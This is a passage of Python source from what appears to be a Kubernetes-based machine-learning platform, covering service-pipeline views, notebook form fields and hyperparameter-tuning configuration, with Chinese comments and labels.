> 100: # 不会有100个依赖关系 break for task_name in tasks_name: # 没有上游的情况 if not dag_json[task_name]: order_dag[task_name] = dag_json[task_name] tasks_name.remove(task_name) continue # 没有上游的情况 elif 'upstream' not in dag_json[ task_name] or not dag_json[task_name]['upstream']: order_dag[task_name] = dag_json[task_name] tasks_name.remove(task_name) continue # 如果有上游依赖的话,先看上游任务是否已经加到里面了。 upstream_all_ready = True for upstream_task_name in dag_json[task_name]['upstream']: if upstream_task_name not in order_dag: upstream_all_ready = False if upstream_all_ready: order_dag[task_name] = dag_json[task_name] tasks_name.remove(task_name) else: dag_json[task_name]['upstream'] = [] order_dag[task_name] = dag_json[task_name] tasks_name.remove(task_name) if list(dag_json.keys()).sort() != list(order_dag.keys()).sort(): flash('dag service pipeline 存在循环或未知上游', category='warning') raise MyappException('dag service pipeline 存在循环或未知上游') return order_dag # 配置上缺少的默认上游 dag_json = json.loads(item.dag_json) item.dag_json = json.dumps(order_by_upstream(copy.deepcopy(dag_json)), ensure_ascii=False, indent=4) # raise Exception('args is not valid') # @pysnooper.snoop() def pre_add(self, item): item.name = item.name.replace('_', '-')[0:54].lower().strip('-') # item.alert_status = ','.join(item.alert_status) # self.service_pipeline_args_check(item) item.create_datetime = datetime.datetime.now() item.change_datetime = datetime.datetime.now() item.parameter = json.dumps({}, indent=4, ensure_ascii=False) item.volume_mount = item.project.volume_mount + ",%s(configmap):/config/" % item.name # @pysnooper.snoop() def pre_update(self, item): if item.expand: core.validate_json(item.expand) item.expand = json.dumps(json.loads(item.expand), indent=4, ensure_ascii=False) else: item.expand = '{}' item.name = item.name.replace('_', '-')[0:54].lower() item.alert_status = ','.join(item.alert_status) # self.service_pipeline_args_check(item) item.change_datetime = datetime.datetime.now() item.parameter = json.dumps( json.loads(item.parameter), indent=4, ensure_ascii=False) if item.parameter else '{}' item.dag_json = json.dumps( json.loads(item.dag_json), indent=4, ensure_ascii=False) if item.dag_json else '{}' item.volume_mount = item.project.volume_mount + ",%s(configmap):/config/" % item.name @expose("/my/list/") def my(self): try: user_id = g.user.id if user_id: service_pipelines = db.session.query( Service_Pipeline).filter_by(created_by_fk=user_id).all() back = [] for service_pipeline in service_pipelines: back.append(service_pipeline.to_json()) return json_response(message='success', status=0, result=back) except Exception as e: print(e) return json_response(message=str(e), status=-1, result={}) def check_service_pipeline_perms(user_fun): # @pysnooper.snoop() def wraps(*args, **kwargs): service_pipeline_id = int(kwargs.get('service_pipeline_id', '0')) if not service_pipeline_id: response = make_response("service_pipeline_id not exist") response.status_code = 404 return response user_roles = [role.name.lower() for role in g.user.roles] if "admin" in user_roles: return user_fun(*args, **kwargs) join_projects_id = security_manager.get_join_projects_id( db.session) service_pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() if service_pipeline.project.id in join_projects_id: return user_fun(*args, **kwargs) response = make_response("no perms to run pipeline %s" % service_pipeline_id) response.status_code = 403 return response return wraps # 构建同步服务 def build_http(self, service_pipeline): pass # 构建异步服务 @pysnooper.snoop() def build_mq_consumer(self, service_pipeline): namespace = conf.get('SERVICE_PIPELINE_NAMESPACE') name = service_pipeline.name command = service_pipeline.command image_secrets = conf.get('HUBSECRET', []) user_hubsecrets = db.session.query(Repository.hubsecret).filter( Repository.created_by_fk == g.user.id).all() if user_hubsecrets: for hubsecret in user_hubsecrets: if hubsecret[0] not in image_secrets: image_secrets.append(hubsecret[0]) from myapp.utils.py.py_k8s import K8s k8s_client = K8s(service_pipeline.project.cluster.get( 'KUBECONFIG', '')) dag_json = service_pipeline.dag_json if service_pipeline.dag_json else '{}' # 生成服务使用的configmap config_data = {"dag.json": dag_json} k8s_client.create_configmap(namespace=namespace, name=name, data=config_data, labels={'app': name}) env = service_pipeline.env if conf.get('SERVICE_PIPELINE_JAEGER', ''): env['JAEGER_HOST'] = conf.get('SERVICE_PIPELINE_JAEGER', '') env['SERVICE_NAME'] = name k8s_client.create_deployment( namespace=namespace, name=name, replicas=service_pipeline.replicas, labels={ "app": name, "username": service_pipeline.created_by.username }, # command=['sh','-c',command] if command else None, command=['bash', '-c', "python mq-pipeline/cube_kafka.py"], args=None, volume_mount=service_pipeline.volume_mount, working_dir=service_pipeline.working_dir, node_selector=service_pipeline.get_node_selector(), resource_memory=service_pipeline.resource_memory, resource_cpu=service_pipeline.resource_cpu, resource_gpu=service_pipeline.resource_gpu if service_pipeline.resource_gpu else '', image_pull_policy=conf.get('IMAGE_PULL_POLICY', 'Always'), image_pull_secrets=image_secrets, image=service_pipeline.images, hostAliases=conf.get('HOSTALIASES', ''), env=env, privileged=False, accounts=None, username=service_pipeline.created_by.username, ports=None) pass # 只能有一个入口。不能同时接口两个队列 # # @event_logger.log_this @expose("/run_service_pipeline/<service_pipeline_id>", methods=["GET", "POST"]) @check_service_pipeline_perms def run_service_pipeline(self, service_pipeline_id): service_pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() dag_json = json.loads(service_pipeline.dag_json) root_nodes_name = service_pipeline.get_root_node_name() self.clear(service_pipeline_id) if root_nodes_name: root_node_name = root_nodes_name[0] root_node = dag_json[root_node_name] # 构建异步 if root_node['template-group'] == 'endpoint' and root_node[ 'template'] == 'mq': self.build_mq_consumer(service_pipeline) # 构建同步 if root_node['template-group'] == 'endpoint' and root_node[ 'template'] == 'gateway': self.build_http(service_pipeline) return redirect("/service_pipeline_modelview/web/log/%s" % service_pipeline_id) # return redirect(run_url) # # @event_logger.log_this @expose("/web/<service_pipeline_id>", methods=["GET"]) def web(self, service_pipeline_id): service_pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() # service_pipeline.dag_json = service_pipeline.fix_dag_json() # service_pipeline.expand = json.dumps(service_pipeline.fix_position(), indent=4, ensure_ascii=False) db.session.commit() print(service_pipeline_id) data = { "url": '/static/appbuilder/vison/index.html?pipeline_id=%s' % service_pipeline_id # 前后端集成完毕,这里需要修改掉 } # 返回模板 return self.render_template('link.html', data=data) # # @event_logger.log_this @expose("/web/log/<service_pipeline_id>", methods=["GET"]) def web_log(self, service_pipeline_id): service_pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() if service_pipeline.run_id: data = { "url": service_pipeline.project.cluster.get('PIPELINE_URL') + "runs/details/" + service_pipeline.run_id, "target": "div.page_f1flacxk:nth-of-type(0)", # "div.page_f1flacxk:nth-of-type(0)", "delay": 500, "loading": True } # 返回模板 if service_pipeline.project.cluster['NAME'] == conf.get( 'ENVIRONMENT'): return self.render_template('link.html', data=data) else: return self.render_template('external_link.html', data=data) else: flash('no running instance', 'warning') return redirect('/service_pipeline_modelview/web/%s' % service_pipeline.id) # 链路跟踪 @expose("/web/monitoring/<service_pipeline_id>", methods=["GET"]) def web_monitoring(self, service_pipeline_id): service_pipeline = db.session.query(Service_Pipeline).filter_by( id=int(service_pipeline_id)).first() if service_pipeline.run_id: url = service_pipeline.project.cluster.get( 'GRAFANA_HOST', '').strip('/') + conf.get( 'GRAFANA_TASK_PATH') + service_pipeline.name return redirect(url) else: flash('no running instance', 'warning') return redirect('/service_pipeline_modelview/web/%s' % service_pipeline.id) # # @event_logger.log_this @expose("/web/pod/<service_pipeline_id>", methods=["GET"]) def web_pod(self, service_pipeline_id): service_pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() data = { "url": service_pipeline.project.cluster.get('K8S_DASHBOARD_CLUSTER', '') + '#/search?namespace=%s&q=%s' % (conf.get('SERVICE_PIPELINE_NAMESPACE'), service_pipeline.name.replace('_', '-')), "target": "div.kd-chrome-container.kd-bg-background", "delay": 500, "loading": True } # 返回模板 if service_pipeline.project.cluster['NAME'] == conf.get('ENVIRONMENT'): return self.render_template('link.html', data=data) else: return self.render_template('external_link.html', data=data) @expose('/clear/<service_id>', methods=['POST', "GET"]) def clear(self, service_pipeline_id): service_pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() from myapp.utils.py.py_k8s import K8s k8s_client = K8s(service_pipeline.project.cluster.get( 'KUBECONFIG', '')) namespace = conf.get('SERVICE_PIPELINE_NAMESPACE') k8s_client.delete_deployment(namespace=namespace, name=service_pipeline.name) flash('服务清理完成', category='warning') return redirect('/service_pipeline_modelview/list/') @expose("/config/<service_pipeline_id>", methods=("GET", 'POST')) def pipeline_config(self, service_pipeline_id): print(service_pipeline_id) pipeline = db.session.query(Service_Pipeline).filter_by( id=service_pipeline_id).first() if not pipeline: return jsonify({"status": 1, "message": "服务流不存在", "result": {}}) if request.method.lower() == 'post': data = request.get_json() request_config = data.get('config', {}) request_dag = data.get('dag_json', {}) if request_config: pipeline.config = json.dumps(request_config, indent=4, ensure_ascii=False) if request_dag: pipeline.dag_json = json.dumps(request_dag, indent=4, ensure_ascii=False) db.session.commit() config = { "id": pipeline.id, "name": pipeline.name, "label": pipeline.describe, "project": pipeline.project.describe, "pipeline_ui_config": { "alert": { "alert_user": { "type": "str", "item_type": "str", "label": "报警用户", "require": 1, "choice": [], "range": "", "default": "", "placeholder": "报警用户名,逗号分隔", "describe": "报警用户,逗号分隔", "editable": 1, "condition": "", "sub_args": {} } } }, "pipeline_jump_button": [{ "name": "资源查看", "action_url": "", "icon_svg": '<svg t="1644980982636" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="2611" width="128" height="128"><path d="M913.937279 113.328092c-32.94432-32.946366-76.898391-51.089585-123.763768-51.089585s-90.819448 18.143219-123.763768 51.089585L416.737356 362.999454c-32.946366 32.94432-51.089585 76.898391-51.089585 123.763768s18.143219 90.819448 51.087539 123.763768c25.406646 25.40767 57.58451 42.144866 93.053326 48.403406 1.76418 0.312108 3.51915 0.463558 5.249561 0.463558 14.288424 0 26.951839-10.244318 29.519314-24.802896 2.879584-16.322757-8.016581-31.889291-24.339338-34.768875-23.278169-4.106528-44.38386-15.081487-61.039191-31.736818-21.61018-21.61018-33.509185-50.489928-33.509185-81.322144s11.899004-59.711963 33.509185-81.322144l15.864316-15.864316c-0.267083 1.121544-0.478907 2.267647-0.6191 3.440355-1.955538 16.45988 9.800203 31.386848 26.260084 33.344432 25.863041 3.072989 49.213865 14.378475 67.527976 32.692586 21.608134 21.608134 33.509185 50.489928 33.509185 81.322144s-11.901051 59.71401-33.509185 81.322144L318.53987 871.368764c-21.61018 21.61018-50.489928 33.511231-81.322144 33.511231-30.832216 0-59.711963-11.901051-81.322144-33.511231-21.61018-21.61018-33.509185-50.489928-33.509185-81.322144s11.899004-59.711963 33.509185-81.322144l169.43597-169.438017c11.720949-11.718903 11.720949-30.722722 0-42.441625-11.718903-11.718903-30.722722-11.718903-42.441625 0L113.452935 666.282852c-32.946366 32.94432-51.089585 76.898391-51.089585 123.763768 0 46.865377 18.143219 90.819448 51.089585 123.763768 32.94432 32.946366 76.898391 51.091632 123.763768 51.091632s90.819448-18.145266 123.763768-51.091632l249.673409-249.671363c32.946366-32.94432 51.089585-76.898391 51.089585-123.763768-0.002047-46.865377-18.145266-90.819448-51.089585-123.763768-27.5341-27.536146-64.073294-45.240367-102.885252-49.854455-3.618411-0.428765-7.161097-0.196475-10.508331 0.601704l211.589023-211.589023c21.61018-21.61018 50.489928-33.509185 81.322144-33.509185s59.711963 11.899004 81.322144 33.509185c21.61018 21.61018 33.509185 50.489928 33.509185 81.322144s-11.899004 59.711963-33.509185 81.322144l-150.180418 150.182464c-11.720949 11.718903-11.720949 30.722722 0 42.441625 11.718903 11.718903 30.722722 11.718903 42.441625 0l150.180418-150.182464c32.946366-32.94432 51.089585-76.898391 51.089585-123.763768C965.026864 190.226482 946.882622 146.272411 913.937279 113.328092z" p-id="2612" fill="#225ed2"></path></svg>' }, { "name": "链路追踪", "action_url": "http://swallow.music.woa.com/myapp/swallow#/?pathUrl=%2Fswallow%2FdispatchOps%2FTaskListManager", "icon_svg": '<svg t="1644980982636" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="2611" width="128" height="128"><path d="M913.937279 113.328092c-32.94432-32.946366-76.898391-51.089585-123.763768-51.089585s-90.819448 18.143219-123.763768 51.089585L416.737356 362.999454c-32.946366 32.94432-51.089585 76.898391-51.089585 123.763768s18.143219 90.819448 51.087539 123.763768c25.406646 25.40767 57.58451 42.144866 93.053326 48.403406 1.76418 0.312108 3.51915 0.463558 5.249561 0.463558 14.288424 0 26.951839-10.244318 29.519314-24.802896 2.879584-16.322757-8.016581-31.889291-24.339338-34.768875-23.278169-4.106528-44.38386-15.081487-61.039191-31.736818-21.61018-21.61018-33.509185-50.489928-33.509185-81.322144s11.899004-59.711963 33.509185-81.322144l15.864316-15.864316c-0.267083 1.121544-0.478907 2.267647-0.6191 3.440355-1.955538 16.45988 9.800203 31.386848 26.260084 33.344432 25.863041 3.072989 49.213865 14.378475 67.527976 32.692586 21.608134 21.608134 33.509185 50.489928 33.509185 81.322144s-11.901051 59.71401-33.509185 81.322144L318.53987 871.368764c-21.61018 21.61018-50.489928 33.511231-81.322144 33.511231-30.832216 0-59.711963-11.901051-81.322144-33.511231-21.61018-21.61018-33.509185-50.489928-33.509185-81.322144s11.899004-59.711963 33.509185-81.322144l169.43597-169.438017c11.720949-11.718903 11.720949-30.722722 0-42.441625-11.718903-11.718903-30.722722-11.718903-42.441625 0L113.452935 666.282852c-32.946366 32.94432-51.089585 76.898391-51.089585 123.763768 0 46.865377 18.143219 90.819448 51.089585 123.763768 32.94432 32.946366 76.898391 51.091632 123.763768 51.091632s90.819448-18.145266 123.763768-51.091632l249.673409-249.671363c32.946366-32.94432 51.089585-76.898391 51.089585-123.763768-0.002047-46.865377-18.145266-90.819448-51.089585-123.763768-27.5341-27.536146-64.073294-45.240367-102.885252-49.854455-3.618411-0.428765-7.161097-0.196475-10.508331 0.601704l211.589023-211.589023c21.61018-21.61018 50.489928-33.509185 81.322144-33.509185s59.711963 11.899004 81.322144 33.509185c21.61018 21.61018 33.509185 50.489928 33.509185 81.322144s-11.899004 59.711963-33.509185 81.322144l-150.180418 150.182464c-11.720949 11.718903-11.720949 30.722722 0 42.441625 11.718903 11.718903 30.722722 11.718903 42.441625 0l150.180418-150.182464c32.946366-32.94432 51.089585-76.898391 51.089585-123.763768C965.026864 190.226482 946.882622 146.272411 913.937279 113.328092z" p-id="2612" fill="#225ed2"></path></svg>' }], "pipeline_run_button": [], "task_jump_button": [], "dag_json": json.loads(pipeline.dag_json), "config": json.loads(pipeline.config), "message": "success", "status": 0 } return jsonify(config) @expose("/template/list/") def template_list(self): all_template = { "message": "success", "templte_common_ui_config": {}, "template_group_order": ["入口", "逻辑节点", "功能节点"], "templte_list": { "入口": [{ "template_name": "kafka", "template_id": 1, "templte_ui_config": { "shell": { "topic": { "type": "str", "item_type": "str", "label": "topic", "require": 1, "choice": [], "range": "", "default": "predict", "placeholder": "", "describe": "kafka topic", "editable": 1, "condition": "", "sub_args": {} }, "consumer_num": { "type": "str", "item_type": "str", "label": "消费者数目", "require": 1, "choice": [], "range": "", "default": "4", "placeholder": "", "describe": "消费者数目", "editable": 1, "condition": "", "sub_args": {} }, "bootstrap_servers": { "type": "str", "item_type": "str", "label": "地址", "require": 1, "choice": [], "range": "", "default": "127.0.0.1:9092", "placeholder": "", "describe": "xx.xx.xx.xx:9092,xx.xx.xx.xx:9092", "editable": 1, "condition": "", "sub_args": {} }, "group": { "type": "str", "item_type": "str", "label": "分组", "require": 1, "choice": [], "range": "", "default": "predict", "placeholder": "", "describe": "消费者分组", "editable": 1, "condition": "", "sub_args": {} } } }, "username": g.user.username, "changed_on": datetime.datetime.now(), "created_on": datetime.datetime.now(), "label": "kafka", "describe": "消费kafka数据", "help_url": "", "pass_through": { # 无论什么内容 通过task的字段透传回来 } }], "逻辑节点": [ { "template_name": "switch", "template_id": 2, "templte_ui_config": { "shell": { "case": { "type": "text", "item_type": "str", "label": "表达式", "require": 1, "choice": [], "range": "", "default": "int(input['node2'])<3:node4,node5:'3'\ndefault:node6:'0'", "placeholder": "", "describe": "条件:下游节点:输出 其中input为节点输入", "editable": 1, "condition": "", "sub_args": {} } } }, "username": g.user.username, "changed_on": datetime.datetime.now(), "created_on": datetime.datetime.now(), "label": "switch-case逻辑节点", "describe": "控制数据的流量", "help_url": "", "pass_through": { # 无论什么内容 通过task的字段透传回来 } }, ], "功能节点": [ { "template_name": "http", "template_id": 3, "templte_ui_config": { "shell": { "method": { "type": "choice", "item_type": "str", "label": "请求方式", "require": 1, "choice": ["GET", "POST"], "range": "", "default": "POST", "placeholder": "", "describe": "请求方式", "editable": 1, "condition": "", "sub_args": {} }, "url": { "type": "str", "item_type": "str", "label": "请求地址", "require": 1, "choice": [], "range": "", "default": "http://127.0.0.1:8080/api", "placeholder": "", "describe": "请求地址", "editable": 1, "condition": "", "sub_args": {} }, "header": { "type": "text", "item_type": "str", "label": "请求头", "require": 1, "choice": [], "range": "", "default": "{}", "placeholder": "", "describe": "请求头", "editable": 1, "condition": "", "sub_args": {} }, "timeout": { "type": "int", "item_type": "str", "label": "请求超时", "require": 1, "choice": [], "range": "", "default": "300", "placeholder": "", "describe": "请求超时", "editable": 1, "condition": "", "sub_args": {} }, "date": { "type": "text", "item_type": "str", "label": "请求内容", "require": 1, "choice": [], "range": "", "default": "{}", "placeholder": "", "describe": "请求内容", "editable": 1, "condition": "", "sub_args": {} } } }, "username": g.user.username, "changed_on": datetime.datetime.now(), "created_on": datetime.datetime.now(), "label": "http请求", "describe": "http请求", "help_url": "", "pass_through": { # 无论什么内容 通过task的字段透传回来 } }, { "template_name": "自定义方法", "template_id": 4, "templte_ui_config": { "shell": { "sdk_path": { "type": "str", "item_type": "str", "label": "函数文件地址", "require": 1, "choice": [], "range": "", "default": "", "placeholder": "", "describe": "函数文件地址,文件名和python类型要相同", "editable": 1, "condition": "", "sub_args": {} }, } }, "username": g.user.username, "changed_on": datetime.datetime.now(), "created_on": datetime.datetime.now(), "label": "http请求", "describe": "http请求", "help_url": "", "pass_through": { # 无论什么内容 通过task的字段透传回来 } } ], }, "status": 0 } index = 1 for group in all_template['templte_list']: for template in all_template['templte_list'][group]: template['template_id'] = index template['changed_on'] = datetime.datetime.now().strftime( '%Y-%m-%d %H:%M:%S') template['created_on'] = datetime.datetime.now().strftime( '%Y-%m-%d %H:%M:%S') template['username'] = g.user.username, index += 1 return jsonify(all_template)
def set_column(self, notebook=None): # 对编辑进行处理 self.add_form_extra_fields['name'] = StringField( _(self.datamodel.obj.lab('name')), default="%s-" % g.user.username + uuid.uuid4().hex[:4], description='英文名(字母、数字、-组成),最长50个字符', widget=MyBS3TextFieldWidget(readonly=True if notebook else False), validators=[ DataRequired(), Regexp("^[a-z][a-z0-9\-]*[a-z0-9]$"), Length(1, 54) ] # 注意不能以-开头和结尾 ) self.add_form_extra_fields['describe'] = StringField( _(self.datamodel.obj.lab('describe')), default='%s的个人notebook' % g.user.username, description='中文描述', widget=BS3TextFieldWidget(), validators=[DataRequired()]) # "project": QuerySelectField( # _(datamodel.obj.lab('project')), # query_factory=filter_join_org_project, # allow_blank=True, # widget=Select2Widget() # ), self.add_form_extra_fields['project'] = QuerySelectField( _(self.datamodel.obj.lab('project')), default='', description=_(r'部署项目组'), query_factory=filter_join_org_project, widget=MySelect2Widget( extra_classes="readonly" if notebook else None, new_web=False), ) self.add_form_extra_fields['images'] = SelectField( _(self.datamodel.obj.lab('images')), description=_(r'notebook基础环境镜像,如果显示不准确,请删除新建notebook'), widget=MySelect2Widget( extra_classes="readonly" if notebook else None, new_web=False), choices=conf.get('NOTEBOOK_IMAGES', []), # validators=[DataRequired()] ) self.add_form_extra_fields['node_selector'] = StringField( _(self.datamodel.obj.lab('node_selector')), default='cpu=true,notebook=true', description="部署task所在的机器", widget=BS3TextFieldWidget()) self.add_form_extra_fields['image_pull_policy'] = SelectField( _(self.datamodel.obj.lab('image_pull_policy')), description="镜像拉取策略(Always为总是拉取远程镜像,IfNotPresent为若本地存在则使用本地镜像)", widget=Select2Widget(), choices=[['Always', 'Always'], ['IfNotPresent', 'IfNotPresent']]) self.add_form_extra_fields['volume_mount'] = StringField( _(self.datamodel.obj.lab('volume_mount')), default=notebook.project.volume_mount if notebook else '', description= '外部挂载,格式:$pvc_name1(pvc):/$container_path1,$pvc_name2(pvc):/$container_path2', widget=BS3TextFieldWidget()) self.add_form_extra_fields['working_dir'] = StringField( _(self.datamodel.obj.lab('working_dir')), default='/mnt', description="工作目录,如果为空,则使用Dockerfile中定义的workingdir", widget=BS3TextFieldWidget()) self.add_form_extra_fields['resource_memory'] = StringField( _(self.datamodel.obj.lab('resource_memory')), default=Notebook.resource_memory.default.arg, description='内存的资源使用限制,示例:1G,20G', widget=BS3TextFieldWidget(), validators=[DataRequired()]) self.add_form_extra_fields['resource_cpu'] = StringField( _(self.datamodel.obj.lab('resource_cpu')), default=Notebook.resource_cpu.default.arg, description='cpu的资源使用限制(单位:核),示例:2', widget=BS3TextFieldWidget(), validators=[DataRequired()]) self.add_form_extra_fields['resource_gpu'] = StringField( _(self.datamodel.obj.lab('resource_gpu')), default='0', description= 'gpu的资源使用限gpu的资源使用限制(单位卡),示例:1,2,训练任务每个容器独占整卡。申请具体的卡型号,可以类似 1(V100),目前支持T4/V100/A100/VGPU', widget=BS3TextFieldWidget(), # choices=conf.get('GPU_CHOICES', [[]]), validators=[DataRequired()]) columns = [ 'name', 'describe', 'images', 'resource_memory', 'resource_cpu', 'resource_gpu' ] self.add_columns = ['project'] + columns # 添加的时候没有挂载配置,使用项目中的挂载配置 # 修改的时候管理员可以在上面添加一些特殊的挂载配置,适应一些特殊情况 if g.user.is_admin(): columns.append('volume_mount') self.edit_columns = ['project'] + columns self.edit_form_extra_fields = self.add_form_extra_fields
class Hyperparameter_Tuning_ModelView_Base(): datamodel = SQLAInterface(Hyperparameter_Tuning) conv = GeneralModelConverter(datamodel) label_title='超参搜索' check_redirect_list_url = '/hyperparameter_tuning_modelview/list/' help_url = conf.get('HELP_URL', {}).get(datamodel.obj.__tablename__, '') if datamodel else '' base_permissions = ['can_add', 'can_edit', 'can_delete', 'can_list', 'can_show'] # 默认为这些 base_order = ('id', 'desc') base_filters = [["id", HP_Filter, lambda: []]] # 设置权限过滤器 order_columns = ['id'] list_columns = ['project','name_url','describe','job_type','creator','run_url','modified'] show_columns = ['created_by','changed_by','created_on','changed_on','job_type','name','namespace','describe', 'parallel_trial_count','max_trial_count','max_failed_trial_count','objective_type', 'objective_goal','objective_metric_name','objective_additional_metric_names','algorithm_name', 'algorithm_setting','parameters_html','trial_spec_html','experiment_html'] add_form_query_rel_fields = { "project": [["name", Project_Filter, 'org']] } edit_form_query_rel_fields = add_form_query_rel_fields edit_form_extra_fields={} edit_form_extra_fields["alert_status"] = MySelectMultipleField( label=_(datamodel.obj.lab('alert_status')), widget=Select2ManyWidget(), choices=[[x, x] for x in ['Pending', 'Running', 'Succeeded', 'Failed', 'Unknown', 'Waiting', 'Terminated']], description="选择通知状态", ) edit_form_extra_fields['name'] = StringField( _(datamodel.obj.lab('name')), description='英文名(字母、数字、- 组成),最长50个字符', widget=BS3TextFieldWidget(), validators=[DataRequired(), Regexp("^[a-z][a-z0-9\-]*[a-z0-9]$"), Length(1, 54)] ) edit_form_extra_fields['describe'] = StringField( _(datamodel.obj.lab('describe')), description='中文描述', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['namespace'] = StringField( _(datamodel.obj.lab('namespace')), description='运行命名空间', widget=BS3TextFieldWidget(), default=datamodel.obj.namespace.default.arg, validators=[DataRequired()] ) edit_form_extra_fields['parallel_trial_count'] = IntegerField( _(datamodel.obj.lab('parallel_trial_count')), default=datamodel.obj.parallel_trial_count.default.arg, description='可并行的计算实例数目', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['max_trial_count'] = IntegerField( _(datamodel.obj.lab('max_trial_count')), default=datamodel.obj.max_trial_count.default.arg, description='最大并行的计算实例数目', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['max_failed_trial_count'] = IntegerField( _(datamodel.obj.lab('max_failed_trial_count')), default=datamodel.obj.max_failed_trial_count.default.arg, description='最大失败的计算实例数目', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['objective_type'] = SelectField( _(datamodel.obj.lab('objective_type')), default=datamodel.obj.objective_type.default.arg, description='目标函数类型(和自己代码中对应)', widget=Select2Widget(), choices=[['maximize', 'maximize'], ['minimize', 'minimize']], validators=[DataRequired()] ) edit_form_extra_fields['objective_goal'] = FloatField( _(datamodel.obj.lab('objective_goal')), default=datamodel.obj.objective_goal.default.arg, description='目标门限', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['objective_metric_name'] = StringField( _(datamodel.obj.lab('objective_metric_name')), default=datamodel.obj.objective_metric_name.default.arg, description='目标函数(和自己代码中对应)', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['objective_additional_metric_names'] = StringField( _(datamodel.obj.lab('objective_additional_metric_names')), default=datamodel.obj.objective_additional_metric_names.default.arg, description='其他目标函数(和自己代码中对应)', widget=BS3TextFieldWidget() ) algorithm_name_choices = ['grid', 'random', 'hyperband', 'bayesianoptimization'] algorithm_name_choices = [[algorithm_name_choice, algorithm_name_choice] for algorithm_name_choice in algorithm_name_choices] edit_form_extra_fields['algorithm_name'] = SelectField( _(datamodel.obj.lab('algorithm_name')), default=datamodel.obj.algorithm_name.default.arg, description='搜索算法', widget=Select2Widget(), choices=algorithm_name_choices, validators=[DataRequired()] ) edit_form_extra_fields['algorithm_setting'] = StringField( _(datamodel.obj.lab('algorithm_setting')), default=datamodel.obj.algorithm_setting.default.arg, widget=BS3TextFieldWidget(), description='搜索算法配置' ) edit_form_extra_fields['parameters_demo'] = StringField( _(datamodel.obj.lab('parameters_demo')), description='搜索参数示例,标准json格式,注意:所有整型、浮点型都写成字符串型', widget=MyCodeArea(code=core.hp_parameters_demo()), ) edit_form_extra_fields['parameters'] = StringField( _(datamodel.obj.lab('parameters')), default=datamodel.obj.parameters.default.arg, description='搜索参数,注意:所有整型、浮点型都写成字符串型', widget=MyBS3TextAreaFieldWidget(rows=10), validators=[DataRequired()] ) edit_form_extra_fields['node_selector'] = StringField( _(datamodel.obj.lab('node_selector')), description="部署task所在的机器(目前无需填写)", widget=BS3TextFieldWidget() ) edit_form_extra_fields['working_dir'] = StringField( _(datamodel.obj.lab('working_dir')), description="工作目录,如果为空,则使用Dockerfile中定义的workingdir", widget=BS3TextFieldWidget() ) edit_form_extra_fields['image_pull_policy'] = SelectField( _(datamodel.obj.lab('image_pull_policy')), description="镜像拉取策略(always为总是拉取远程镜像,IfNotPresent为若本地存在则使用本地镜像)", widget=Select2Widget(), choices=[['Always', 'Always'], ['IfNotPresent', 'IfNotPresent']] ) edit_form_extra_fields['volume_mount'] = StringField( _(datamodel.obj.lab('volume_mount')), description='外部挂载,格式:$pvc_name1(pvc):/$container_path1,$pvc_name2(pvc):/$container_path2', widget=BS3TextFieldWidget() ) edit_form_extra_fields['resource_memory'] = StringField( _(datamodel.obj.lab('resource_memory')), default=datamodel.obj.resource_memory.default.arg, description='内存的资源使用限制(每个测试实例),示例:1G,20G', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) edit_form_extra_fields['resource_cpu'] = StringField( _(datamodel.obj.lab('resource_cpu')), default=datamodel.obj.resource_cpu.default.arg, description='cpu的资源使用限制(每个测试实例)(单位:核),示例:2', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) # @pysnooper.snoop() def set_column(self, hp=None): # 对编辑进行处理 request_data = request.args.to_dict() job_type = request_data.get('job_type', '') if hp: job_type = hp.job_type job_type_choices = ['','TFJob','XGBoostJob','PyTorchJob','Job'] job_type_choices = [[job_type_choice,job_type_choice] for job_type_choice in job_type_choices] if hp: self.edit_form_extra_fields['job_type'] = SelectField( _(self.datamodel.obj.lab('job_type')), description="超参搜索的任务类型", choices=job_type_choices, widget=MySelect2Widget(extra_classes="readonly",value=job_type), validators=[DataRequired()] ) else: self.edit_form_extra_fields['job_type'] = SelectField( _(self.datamodel.obj.lab('job_type')), description="超参搜索的任务类型", widget=MySelect2Widget(new_web=True,value=job_type), choices=job_type_choices, validators=[DataRequired()] ) self.edit_form_extra_fields['tf_worker_num'] = IntegerField( _(self.datamodel.obj.lab('tf_worker_num')), default=json.loads(hp.job_json).get('tf_worker_num',3) if hp and hp.job_json else 3, description='工作节点数目', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['tf_worker_image'] = StringField( _(self.datamodel.obj.lab('tf_worker_image')), default=json.loads(hp.job_json).get('tf_worker_image',conf.get('KATIB_TFJOB_DEFAULT_IMAGE','')) if hp and hp.job_json else conf.get('KATIB_TFJOB_DEFAULT_IMAGE',''), description='工作节点镜像', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['tf_worker_command'] = StringField( _(self.datamodel.obj.lab('tf_worker_command')), default=json.loads(hp.job_json).get('tf_worker_command','python xx.py') if hp and hp.job_json else 'python xx.py', description='工作节点启动命令', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['job_worker_image'] = StringField( _(self.datamodel.obj.lab('job_worker_image')), default=json.loads(hp.job_json).get('job_worker_image',conf.get('KATIB_JOB_DEFAULT_IMAGE','')) if hp and hp.job_json else conf.get('KATIB_JOB_DEFAULT_IMAGE',''), description='工作节点镜像', widget=BS3TextFieldWidget(), validators=[DataRequired()] ) self.edit_form_extra_fields['job_worker_command'] = StringField( _(self.datamodel.obj.lab('job_worker_command')), default=json.loads(hp.job_json).get('job_worker_command','python xx.py') if hp and hp.job_json else 'python xx.py', 